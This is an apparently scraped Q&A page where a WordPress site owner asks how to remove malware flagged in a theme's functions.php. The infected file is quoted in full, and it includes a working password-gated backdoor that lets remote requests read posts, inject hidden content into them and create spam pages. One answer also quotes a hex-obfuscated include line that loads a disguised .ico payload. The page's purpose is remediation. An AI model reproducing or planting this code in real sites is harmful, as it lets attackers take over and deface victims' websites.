-->

How to get rid of “SiteLock-PHP-FILEHACKER-of.UNOF

2019-07-24 12:30发布

站内文章 / PHP
69 0 0

问题:

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == ''))
{
    switch ($_REQUEST['action'])
    {
        case 'get_all_links';
            foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
            {
                $data['code'] = '';

                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                {
                    $data['code'] = $_[1];
                }

                print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
            }
            break;

        case 'set_id_links';
            if (isset($_REQUEST['data']))
            {
                $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                {
                    print "true";
                }
            }
            break;

        case 'create_page';
            if (isset($_REQUEST['remove_page']))
            {
                if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                {
                    print "true";
                }
            }
            elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
            {
                if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                {
                    print "true";
                }
            }
            break;

        default: print "ERROR_WP_ACTION WP_URL_CD";
    }

    die("");
}

if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
    $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    if ($data -> full_content)
    {
        print stripslashes($data -> content);
    }
    else
    {
        print '<!DOCTYPE html>';
        print '<html ';
        language_attributes();
        print ' class="no-js">';
        print '<head>';
        print '<title>'.stripslashes($data -> title).'</title>';
        print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
        print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
        print '<meta name="robots" content="index, follow" />';
        print '<meta charset="';
        bloginfo( 'charset' );
        print '" />';
        print '<meta name="viewport" content="width=device-width">';
        print '<link rel="profile" href="http://gmpg.org/xfn/11">';
        print '<link rel="pingback" href="';
        bloginfo( 'pingback_url' );
        print '">';
        wp_head();
        print '</head>';
        print '<body>';
        print '<div id="content" class="site-content">';
        print stripslashes($data -> content);
        get_search_form();
        get_sidebar();
        get_footer();
    }

    exit;
}

?><?php
/*
    Our portfolio:  http://themeforest.net/user/tagDiv/portfolio
    Thanks for using our theme!
    tagDiv - 2016
*/

/**
 * Load the speed booster framework + theme specific files
 */

// load the deploy mode
require_once('td_deploy_mode.php');

// load the config
require_once('includes/td_config.php');
add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9); //we run on 9 priority to allow plugins to updage_key our apis while using the default priority of 10

// load the wp booster
require_once('includes/wp_booster/td_wp_booster_functions.php');

require_once('includes/td_css_generator.php');
require_once('includes/shortcodes/td_misc_shortcodes.php');
require_once('includes/widgets/td_page_builder_widgets.php'); // widgets

/*
 * mobile theme css generator
 * in wp-admin the main theme is loaded and the mobile theme functions are not included
 * required in td_panel_data_source
 * @todo - look for a more elegant solution(ex. generate the css on request)
 */
require_once('mobile/includes/td_css_generator_mob.php');

/* ----------------------------------------------------------------------------
 * Woo Commerce
 */

// breadcrumb
add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs');
function td_woocommerce_breadcrumbs() {
    return array(
        'delimiter' => ' <i class="td-icon-right td-bread-sep"></i> ',
        'wrap_before' => '<div class="entry-crumbs" itemprop="breadcrumb">',
        'wrap_after' => '</div>',
        'before' => '',
        'after' => '',
        'home' => _x('Home', 'breadcrumb', 'woocommerce'),
    );
}

// use own pagination
if (!function_exists('woocommerce_pagination')) {
    // pagination
    function woocommerce_pagination() {
        echo td_page_generator::get_pagination();
    }
}

// Override theme default specification for product 3 per row

// Number of product per page 8
add_filter('loop_shop_per_page', create_function('$cols', 'return 4;'));

if (!function_exists('woocommerce_output_related_products')) {
    // Number of related products
    function woocommerce_output_related_products() {
        woocommerce_related_products(array(
            'posts_per_page' => 4,
            'columns' => 4,
            'orderby' => 'rand',
        )); // Display 4 products in rows of 1
    }
}

/* ----------------------------------------------------------------------------
 * bbPress
 */
// change avatar size to 40px
function td_bbp_change_avatar_size($author_avatar, $topic_id, $size) {
    $author_avatar = '';
    if ($size == 14) {
        $size = 40;
    }
    $topic_id = bbp_get_topic_id( $topic_id );
    if ( !empty( $topic_id ) ) {
        if ( !bbp_is_topic_anonymous( $topic_id ) ) {
            $author_avatar = get_avatar( bbp_get_topic_author_id( $topic_id ), $size );
        } else {
            $author_avatar = get_avatar( get_post_meta( $topic_id, '_bbp_anonymous_email', true ), $size );
        }
    }
    return $author_avatar;
}
add_filter('bbp_get_topic_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_reply_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_current_user_avatar', 'td_bbp_change_avatar_size', 20, 3);

//add_action('shutdown', 'test_td');

function test_td () {
    if (!is_admin()){
        td_api_base::_debug_get_used_on_page_components();
    }
}

/**
 * tdStyleCustomizer.js is required
 */
if (TD_DEBUG_LIVE_THEME_STYLE) {
    add_action('wp_footer', 'td_theme_style_footer');
        // new live theme demos
        function td_theme_style_footer() {
            ?>
            <div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small">
                <div class="td-skin-body">
                    <div class="td-skin-wrap">
                        <div class="td-skin-container td-skin-buy"><a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv">BUY NEWSPAPER NOW!</a></div>
                            <div class="td-skin-container td-skin-header">GET AN AWESOME START!</div>
                            <div class="td-skin-container td-skin-desc">With easy <span>ONE CLICK INSTALL</span> and fully customizable options, our demos are the best start you'll ever get!!</div>
                        <div class="td-skin-container td-skin-content">
                            <div class="td-demos-list">
                                <?php
                                $td_demo_names = array();

                                foreach (td_global::$demo_list as $demo_id => $stack_params) {
                                    $td_demo_names[$stack_params['text']] = $demo_id;
                                    ?>
                                    <div class="td-set-theme-style"><a href="<?php echo td_global::$demo_list[$demo_id]['demo_url'] ?>" class="td-set-theme-style-link td-popup td-popup-<?php echo $td_demo_names[$stack_params['text']] ?>" data-img-url="http://demo.tagdiv.com/demos_popup/newspaper/large/<?php echo $demo_id; ?>.jpg"></a></div>
                                <?php } ?>
                                <div class="clearfix"></div>
                            </div>
                        </div>
                        <div class="td-skin-scroll"><i class="td-icon-read-down"></i></div>
                    </div>
                </div>
                <div class="clearfix"></div>
                <div class="td-set-hide-show"><a href="#" id="td-theme-set-hide"></a></div>
                <div class="td-screen-demo" data-width-preview="380"></div>
                <div class="td-screen-demo-extend"></div>
            </div>
            <?php
    }
}

//print_r(td_global::$all_theme_panels_list);

My hosting virus scanner detects that there is virus in theme function.php file. Not sure how to delete the code without effecting the website. Please help me in clearing the malicious virus code " SiteLock-PHP-FILEHACKER-of.UNOFFICIAL " from this functions.php

回答1:

I've been struggling with this kind of virus and what i did to solve it was:

  1. Analyze all the directory

  2. Based on the files infected open them with vim or nano using and you should see the injection just delete it and your file should be ok

  3. Repeat for all the infected files, some of them are .zip that were imported by the virus delete those and keep the files you originally had.

As recommendation, you should keep your plugins and themes updated

Hope it works, it might not be the more efficient way but it worked for me.



回答2:

These viruses add one line of code in most of your files, these files called affected files.

In my case the affected files have common line :

@include "\x2fho\x6de/\x6bks\x68o3\x62c/\x70ub\x6cic\x5fht\x6dl/\x77p-\x69nc\x6cud\x65s/\x6as/\x6acr\x6fp/\x66av\x69co\x6e_f\x389a\x617.\x69co";

When you remove this line from all these files, you are free from the virus/malware infection.



标签: php wordpress wordpress-theming malware virus
举报

收藏的人(0)

Ta的文章 更多文章
登录 后发表评论
0条评论
还没有人评论过~